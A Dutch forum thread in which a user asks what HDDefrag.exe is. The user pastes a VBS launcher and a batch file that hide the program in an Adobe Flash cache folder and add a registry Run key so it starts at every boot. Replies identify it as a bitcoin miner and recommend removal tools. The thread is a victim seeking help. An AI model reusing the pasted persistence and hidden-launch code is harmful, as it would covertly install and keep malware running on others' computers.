[W8] Wat is HDDefrag.exe ?

Pagina: 1
Acties:

Acties:
  • 0 Henk 'm!

  • Gloeilamp
  • Registratie: Juli 2009
  • Laatst online: 09-10 21:59
Op mijn pc had ik het bestand HDDefrag.exe staan welke 100% van mijn CPU (i5 3570k) gebruikt. Op Google heb ik gezocht naar wat dit bestand/virus/programma precies doet, maar kon hier niet echt een antwoord op vinden.

Hieronder een screenshot welke misschien meer duidelijkheid geeft.

Afbeeldingslocatie: http://oi43.tinypic.com/295uwe0.jpg


De bestandslocatie van HDDefrag is:
C:\Users\<gebruiker>\AppData\Roaming\Adobe\Flash Player\File Cache

Ook is er een BAT en een VBS bestand aanwezig, waarvan de code hieronder staat

file.vbs
code:
1
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


hddef.bat
code:
1
2
3
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v HDDefrag /d "wscript \"%appdata%\Adobe\Flash Player\File Cache\file.vbs\" \"%appdata%\Adobe\Flash Player\File Cache\hddef.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\File Cache\HDDefrag.exe"


Ik heb met malwarebytes en Microsoft Security Essentials op virussen gescanned echter hebben deze scanners geen infecties gevonden.

Kan ik gewoon de register opstartsleutel verwijderen inclusief de bestanden of blijft er dan nog iets achter?
Zijn mijn wachtwoorden nog veilig en weet iemand wat dit programma doet?

Acties:
  • 0 Henk 'm!

  • The_Greater
  • Registratie: Februari 2001
  • Laatst online: 09-10 21:16
Bitcoin miner

Working in the IT : "When you do things right, people won't be sure you've done anything at all"


Acties:
  • 0 Henk 'm!

  • BeefHazard
  • Registratie: Augustus 2010
  • Laatst online: 16:13
Lees dit draadje eens en voer de daar beschreven stappen uit. Als je zelf maar wat dingen verwijdert, kan het zijn dat je niet alles weghaalt en dat je er langer last van hebt dan nodig.

R6 | 24-70 F2.8 DG OS HSM Art | 18-35 F1.8 DC HSM Art | EF 70-200 F4L IS USM | EF 50mm f/1.8 | Zenbook 14 OLED | T14G4 OLED


Acties:
  • 0 Henk 'm!

  • LnC
  • Registratie: Juni 2005
  • Laatst online: 03-08 11:16

LnC

The offending line...

Bitcoinminer inderdaad.
Kijk bij msconfig of deze tussen je startup items staat.
Leesvoer en leesvoer.

Download TDSSKiller en laat deze draaien. Grote kans dat deze het spul wel goed verwijderd.